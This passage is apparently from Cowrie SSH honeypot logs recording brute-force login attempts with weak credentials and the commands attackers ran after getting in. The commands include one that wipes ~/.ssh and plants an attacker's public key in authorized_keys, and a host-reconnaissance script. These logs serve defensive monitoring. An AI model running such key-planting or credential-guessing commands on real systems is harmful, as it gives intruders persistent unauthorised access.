0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:55:12.875651Z","src_ip":"212.227.125.160","session":"a7a793ed5c35"}
{"eventid":"cowrie.login.failed","username":"admin","password":"admin123","message":"login attempt [admin/admin123] failed","sensor":"my-vps","timestamp":"2025-08-26T11:55:13.069865Z","src_ip":"212.227.125.160","session":"a7a793ed5c35"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:55:14.134166Z","src_ip":"212.227.125.160","session":"a7a793ed5c35"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":43152,"dst_ip":"1.2.3.4","dst_port":22,"session":"55f6cd19c599","protocol":"ssh","message":"New connection: 212.227.235.229:43152 (1.2.3.4:22) [session: 55f6cd19c599]","sensor":"my-vps","timestamp":"2025-08-26T11:55:14.935728Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T11:55:14.936401Z","src_ip":"212.227.235.229","session":"55f6cd19c599"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T11:55:15.143083Z","src_ip":"212.227.235.229","session":"55f6cd19c599"}
{"eventid":"cowrie.login.success","username":"root","password":"aaaaa","message":"login attempt [root/aaaaa] succeeded","sensor":"my-vps","timestamp":"2025-08-26T11:55:16.013065Z","src_ip":"212.227.235.229","session":"55f6cd19c599"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T11:55:16.445013Z","src_ip":"212.227.235.229","session":"55f6cd19c599"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T11:55:16.445705Z","src_ip":"212.227.235.229","session":"55f6cd19c599"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T11:55:16.446544Z","src_ip":"212.227.235.229","session":"55f6cd19c599"}
{"eventid":"cowrie.session.connect","src_ip":"83.168.105.65","src_port":35570,"dst_ip":"1.2.3.4","dst_port":22,"session":"0cb9116bfdb4","protocol":"ssh","message":"New connection: 83.168.105.65:35570 (1.2.3.4:22) [session: 0cb9116bfdb4]","sensor":"my-vps","timestamp":"2025-08-26T11:55:16.491689Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:55:16.492561Z","src_ip":"83.168.105.65","session":"0cb9116bfdb4"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:55:16.532917Z","src_ip":"83.168.105.65","session":"0cb9116bfdb4"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:55:16.654805Z","src_ip":"212.227.235.229","session":"55f6cd19c599"}
{"eventid":"cowrie.login.failed","username":"hadoop","password":"123","message":"login attempt [hadoop/123] failed","sensor":"my-vps","timestamp":"2025-08-26T11:55:16.655996Z","src_ip":"83.168.105.65","session":"0cb9116bfdb4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T11:55:17.183452Z","src_ip":"212.227.235.229","session":"55f6cd19c599"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-26T11:55:17.184351Z","src_ip":"212.227.235.229","session":"55f6cd19c599"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":51980,"dst_ip":"1.2.3.4","dst_port":22,"session":"ebb093e5d36b","protocol":"ssh","message":"New connection: 212.227.235.229:51980 (1.2.3.4:22) [session: ebb093e5d36b]","sensor":"my-vps","timestamp":"2025-08-26T11:55:17.301022Z"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-26T11:55:17.394157Z","src_ip":"212.227.235.229","session":"55f6cd19c599"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:55:17.395044Z","src_ip":"212.227.235.229","session":"55f6cd19c599"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":57588,"dst_ip":"1.2.3.4","dst_port":22,"session":"f92159a09053","protocol":"ssh","message":"New connection: 212.227.235.229:57588 (1.2.3.4:22) [session: f92159a09053]","sensor":"my-vps","timestamp":"2025-08-26T11:55:17.594820Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T11:55:17.596212Z","src_ip":"212.227.235.229","session":"f92159a09053"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:55:17.662616Z","src_ip":"212.227.235.229","session":"ebb093e5d36b"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-26T11:55:17.663226Z","src_ip":"212.227.235.229","session":"ebb093e5d36b"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:55:17.697901Z","src_ip":"83.168.105.65","session":"0cb9116bfdb4"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T11:55:17.799528Z","src_ip":"212.227.235.229","session":"f92159a09053"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":58264,"dst_ip":"1.2.3.4","dst_port":22,"session":"b17fd69dc32b","protocol":"ssh","message":"New connection: 212.227.125.160:58264 (1.2.3.4:22) [session: b17fd69dc32b]","sensor":"my-vps","timestamp":"2025-08-26T11:55:18.407720Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:55:18.412566Z","src_ip":"212.227.125.160","session":"b17fd69dc32b"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:55:18.458781Z","src_ip":"212.227.125.160","session":"b17fd69dc32b"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-26T11:55:18.647895Z","src_ip":"212.227.235.229","session":"f92159a09053"}
{"eventid":"cowrie.login.failed","username":"sem2","password":"sem2","message":"login attempt [sem2/sem2] failed","sensor":"my-vps","timestamp":"2025-08-26T11:55:18.690420Z","src_ip":"212.227.125.160","session":"b17fd69dc32b"}
{"eventid":"cowrie.login.success","username":"root","password":"qwerty","message":"login attempt [root/qwerty] succeeded","sensor":"my-vps","timestamp":"2025-08-26T11:55:19.024371Z","src_ip":"212.227.235.229","session":"ebb093e5d36b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T11:55:19.690021Z","src_ip":"212.227.235.229","session":"ebb093e5d36b"}
{"eventid":"cowrie.command.input","input":"uname=$(uname -s -v -n -m 2>/dev/null);; \t\tarch=$(uname -m 2>/dev/null);; \t\tuptime=$(awk '{u=int($1);d=int(u/86400);h=int((u%86400)/3600);m=int((u%3600)/60);s=\"\";if(d>0)s=s d\"d\";if(h>0){if(s!=\"\")s=s\", \";s=s h\"h\"}if(m>0||s==\"\"){if(s!=\"\")s=s\", \";s=s m\"m\"}print s}' /proc/uptime 2>/dev/null);; \t\t[ -z \"$uptime\" ] && secondsStr=$(cat /proc/uptime | cut -d' ' -f1 | cut -d. -f1) && [ -n \"$secondsStr\" ] && seconds=$((secondsStr)) && d=$((seconds/86400)) && h=$(( (seconds%86400)/3600 )) && m=$(( (seconds%3600)/60 )) && uptime=\"\" && [ $d -gt 0 ] && uptime=\"${uptime}${d}d\" && [ $h -gt 0 ] && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${h}h\"; } && { [ $m -gt 0 ] || [ -z \"$uptime\" ]; } && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${m}m\"; };; \t\tcpus=$( (nproc || grep -c \"^processor\" /proc/cpuinfo) 2>/dev/null | head -1);; \t\tcpu_model=$( (grep -m1 \"model name\" /proc/cpuinfo | cut -d: -f2 | sed 's/^ //;s/ *$//' || lscpu | grep -m1 \"Model name\" | cut -d: -f2 | sed 's/^ //;s/ *$//') 2>/dev/null);; \t\tgpu_info=$( (lspci | grep -i vga; lspci | grep -i nvidia) 2>/dev/null | head -n5);; \t\tcat_help=$((cat --help 2>&1 | tr '\\n' ' ') || cat --help 2>&1);; \t\tls_help=$((ls --help 2>&1 | tr '\\n' ' ') || ls --help 2>&1);; \t\tlast_output=$((last | tail -n 10) || last);; \t\techo \"UNAME:$uname\";; \t\techo \"ARCH:$arch\";; \t\techo \"UPTIME:$uptime\";; \t\techo \"CPUS:$cpus\";; \t\techo \"CPU_MODEL:$cpu_model\";; \t\techo \"GPU:$gpu_info\";; \t\techo \"CAT_HELP:$cat_help\";; \t\techo \"LS_HELP:$ls_help\";; \t\techo \"LAST:$last_output\";","message":"CMD: uname=$(uname -s -v -n -m 2>/dev/null);; \t\tarch=$(uname -m 2>/dev/null);; \t\tuptime=$(awk '{u=int($1);d=int(u/86400);h=int((u%86400)/3600);m=int((u%3600)/60);s=\"\";if(d>0)s=s d\"d\";if(h>0){if(s!=\"\")s=s\", \";s=s h\"h\"}if(m>0||s==\"\"){if(s!=\"\")s=s\", \";s=s m\"m\"}print s}' /proc/uptime 2>/dev/null);; \t\t[ -z \"$uptime\" ] && secondsStr=$(cat /proc/uptime | cut -d' ' -f1 | cut -d. -f1) && [ -n \"$secondsStr\" ] && seconds=$((secondsStr)) && d=$((seconds/86400)) && h=$(( (seconds%86400)/3600 )) && m=$(( (seconds%3600)/60 )) && uptime=\"\" && [ $d -gt 0 ] && uptime=\"${uptime}${d}d\" && [ $h -gt 0 ] && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${h}h\"; } && { [ $m -gt 0 ] || [ -z \"$uptime\" ]; } && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${m}m\"; };; \t\tcpus=$( (nproc || grep -c \"^processor\" /proc/cpuinfo) 2>/dev/null | head -1);; \t\tcpu_model=$( (grep -m1 \"model name\" /proc/cpuinfo | cut -d: -f2 | sed 's/^ //;s/ *$//' || lscpu | grep -m1 \"Model name\" | cut -d: -f2 | sed 's/^ //;s/ *$//') 2>/dev/null);; \t\tgpu_info=$( (lspci | grep -i vga; lspci | grep -i nvidia) 2>/dev/null | head -n5);; \t\tcat_help=$((cat --help 2>&1 | tr '\\n' ' ') || cat --help 2>&1);; \t\tls_help=$((ls --help 2>&1 | tr '\\n' ' ') || ls --help 2>&1);; \t\tlast_output=$((last | tail -n 10) || last);; \t\techo \"UNAME:$uname\";; \t\techo \"ARCH:$arch\";; \t\techo \"UPTIME:$uptime\";; \t\techo \"CPUS:$cpus\";; \t\techo \"CPU_MODEL:$cpu_model\";; \t\techo \"GPU:$gpu_info\";; \t\techo \"CAT_HELP:$cat_help\";; \t\techo \"LS_HELP:$ls_help\";; \t\techo \"LAST:$last_output\";","sensor":"my-vps","timestamp":"2025-08-26T11:55:19.690962Z","src_ip":"212.227.235.229","session":"ebb093e5d36b"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -m 2 > /dev/null","message":"CMD: uname -s -v -n -m 2 > /dev/null","sensor":"my-vps","timestamp":"2025-08-26T11:55:19.691583Z","src_ip":"212.227.235.229","session":"ebb093e5d36b"}
{"eventid":"cowrie.command.input","input":"uname -m 2 > /dev/null","message":"CMD: uname -m 2 > /dev/null","sensor":"my-vps","timestamp":"2025-08-26T11:55:19.692571Z","src_ip":"212.227.235.229","session":"ebb093e5d36b"}
{"eventid":"cowrie.command.input","input":"awk {u=int($1","message":"CMD: awk {u=int($1","sensor":"my-vps","timestamp":"2025-08-26T11:55:19.693415Z","src_ip":"212.227.235.229","session":"ebb093e5d36b"}
{"eventid":"cowrie.command.input","input":"cat /proc/uptime | cut -d -f1 | cut -d. -f1","message":"CMD: cat /proc/uptime | cut -d -f1 | cut -d. -f1","sensor":"my-vps","timestamp":"2025-08-26T11:55:19.694274Z","src_ip":"212.227.235.229","session":"ebb093e5d36b"}
{"eventid":"cowrie.command.failed","input":"cat /proc/uptime | cut -d -f1 | cut -d. -f1","message":"Command not found: cat /proc/uptime | cut -d -f1 | cut -d. -f1","sensor":"my-vps","timestamp":"2025-08-26T11:55:19.695096Z","src_ip":"212.227.235.229","session":"ebb093e5d36b"}
{"eventid":"cowrie.command.input","input":"(secondsStr","message":"CMD: (secondsStr","sensor":"my-vps","timestamp":"2025-08-26T11:55:19.696069Z","src_ip":"212.227.235.229","session":"ebb093e5d36b"}
{"eventid":"cowrie.command.input","input":"(seconds/86400","message":"CMD: (seconds/86400","sensor":"my-vps","timestamp":"2025-08-26T11:55:19.696596Z","src_ip":"212.227.235.229","session":"ebb093e5d36b"}
{"eventid":"cowrie.command.input","input":"( (seconds%86400","message":"CMD: ( (seconds%86400","sensor":"my-vps","timestamp":"2025-08-26T11:55:19.697119Z","src_ip":"212.227.235.229","session":"ebb093e5d36b"}
{"eventid":"cowrie.command.input","input":"(seconds%86400","message":"CMD: (seconds%86400","sensor":"my-vps","timestamp":"2025-08-26T11:55:19.697610Z","src_ip":"212.227.235.229","session":"ebb093e5d36b"}
{"eventid":"cowrie.command.input","input":"( (seconds%3600","message":"CMD: ( (seconds%3600","sensor":"my-vps","timestamp":"2025-08-26T11:55:19.698134Z","src_ip":"212.227.235.229","session":"ebb093e5d36b"}
{"eventid":"cowrie.command.input","input":"(seconds%3600","message":"CMD: (seconds%3600","sensor":"my-vps","timestamp":"2025-08-26T11:55:19.698945Z","src_ip":"212.227.235.229","session":"ebb093e5d36b"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:55:19.852542Z","src_ip":"212.227.235.229","session":"f92159a09053"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:55:20.007272Z","src_ip":"212.227.125.160","session":"b17fd69dc32b"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":57598,"dst_ip":"1.2.3.4","dst_port":22,"session":"90fa9d456c29","protocol":"ssh","message":"New connection: 212.227.235.229:57598 (1.2.3.4:22) [session: 90fa9d456c29]","sensor":"my-vps","timestamp":"2025-08-26T11:55:20.053026Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T11:55:20.053818Z","src_ip":"212.227.235.229","session":"90fa9d456c29"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057","shasum":"1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057","destfile":"/dev/null","message":"Saved redir contents with SHA-256 1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057 to var/lib/cowrie/downloads/1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057","sensor":"my-vps","timestamp":"2025-08-26T11:55:20.137741Z","src_ip":"212.227.235.229","session":"ebb093e5d36b"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/ca88d8e2c0cfe079cce0e55390ff79932c81d831016d8b2dfa21f7db9a052f8c","size":74,"shasum":"ca88d8e2c0cfe079cce0e55390ff79932c81d831016d8b2dfa21f7db9a052f8c","duplicate":true,"duration":"0.4","message":"Closing TTY Log: var/lib/cowrie/tty/ca88d8e2c0cfe079cce0e55390ff79932c81d831016d8b2dfa21f7db9a052f8c after 0.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:55:20.138687Z","src_ip":"212.227.235.229","session":"ebb093e5d36b"}
{"eventid":"cowrie.session.closed","duration":"2.8","message":"Connection lost after 2.8 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:55:20.140042Z","src_ip":"212.227.235.229","session":"ebb093e5d36b"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["c